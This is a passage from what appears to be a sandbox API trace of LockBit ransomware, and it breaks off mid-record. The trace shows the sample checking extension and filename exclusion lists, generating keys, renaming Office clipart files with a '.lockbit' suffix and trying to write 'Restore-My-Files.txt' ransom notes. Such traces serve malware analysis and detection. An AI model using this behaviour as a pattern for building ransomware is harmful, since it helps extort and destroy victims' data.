[0165.123] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.123] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02424_.WMF") returned 1 [0165.124] lstrcmpiW (lpString1="ntldr", lpString2="NA02424_.WMF") returned 1 [0165.124] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02424_.WMF") returned 1 [0165.124] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02424_.WMF") returned -1 [0165.124] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02424_.WMF") returned -1 [0165.124] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02424_.WMF") returned 1 [0165.124] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02424_.WMF") returned -1 [0165.124] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.124] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF") returned=".WMF" [0165.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.124] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.124] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.125] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.125] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF.lockbit") returned 72 [0165.125] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02424_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.129] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.129] malloc (_Size=0x40068) returned 0x3d70450 [0165.129] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1340) returned 1 [0165.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0165.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0165.130] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.134] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.134] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.141] free (_Block=0x1fa2ed8) [0165.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02424_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.141] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.141] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1948, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02426_.WMF", cAlternateFileName="")) returned 1 [0165.141] lstrcmpiW (lpString1=".", lpString2="NA02426_.WMF") returned -1 [0165.141] lstrcmpiW (lpString1="..", lpString2="NA02426_.WMF") returned -1 [0165.141] PathFindExtensionW (pszPath="NA02426_.WMF") returned=".WMF" [0165.141] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.141] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.141] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.141] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.142] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.143] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02426_.WMF") returned 1 [0165.143] lstrcmpiW (lpString1="ntldr", lpString2="NA02426_.WMF") returned 1 [0165.144] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02426_.WMF") returned 1 [0165.144] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02426_.WMF") returned -1 [0165.144] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02426_.WMF") returned -1 [0165.144] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02426_.WMF") returned 1 [0165.144] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02426_.WMF") returned -1 [0165.144] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.144] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF") returned=".WMF" [0165.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.144] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.144] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.145] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.145] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF.lockbit") returned 72 [0165.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02426_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0165.146] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.146] malloc (_Size=0x40068) returned 0x3f70048 [0165.146] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=6472) returned 1 [0165.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0165.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.148] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0165.148] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.150] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.150] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.150] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.151] free (_Block=0x1fa2ed8) [0165.151] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02426_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.151] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.152] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1c2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02431_.WMF", cAlternateFileName="")) returned 1 [0165.152] lstrcmpiW (lpString1=".", lpString2="NA02431_.WMF") returned -1 [0165.152] lstrcmpiW (lpString1="..", lpString2="NA02431_.WMF") returned -1 [0165.152] PathFindExtensionW (pszPath="NA02431_.WMF") returned=".WMF" [0165.152] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0165.152] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0165.153] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0165.153] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0165.154] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02431_.WMF") returned 1 [0165.154] lstrcmpiW (lpString1="ntldr", lpString2="NA02431_.WMF") returned 1 [0165.154] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02431_.WMF") returned 1 [0165.154] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02431_.WMF") returned -1 [0165.154] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02431_.WMF") returned -1 [0165.154] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02431_.WMF") returned 1 [0165.154] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02431_.WMF") returned -1 [0165.154] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.154] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF") returned=".WMF" [0165.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0165.155] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0165.155] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0165.156] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0165.156] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF.lockbit") returned 72 [0165.156] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02431_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0165.157] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.157] malloc (_Size=0x40068) returned 0x3e70008 [0165.157] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7212) returned 1 [0165.157] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0165.158] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.158] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.158] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0165.158] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0165.164] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02431_.WMF.lockbit", NtFileNamePart=0x0, 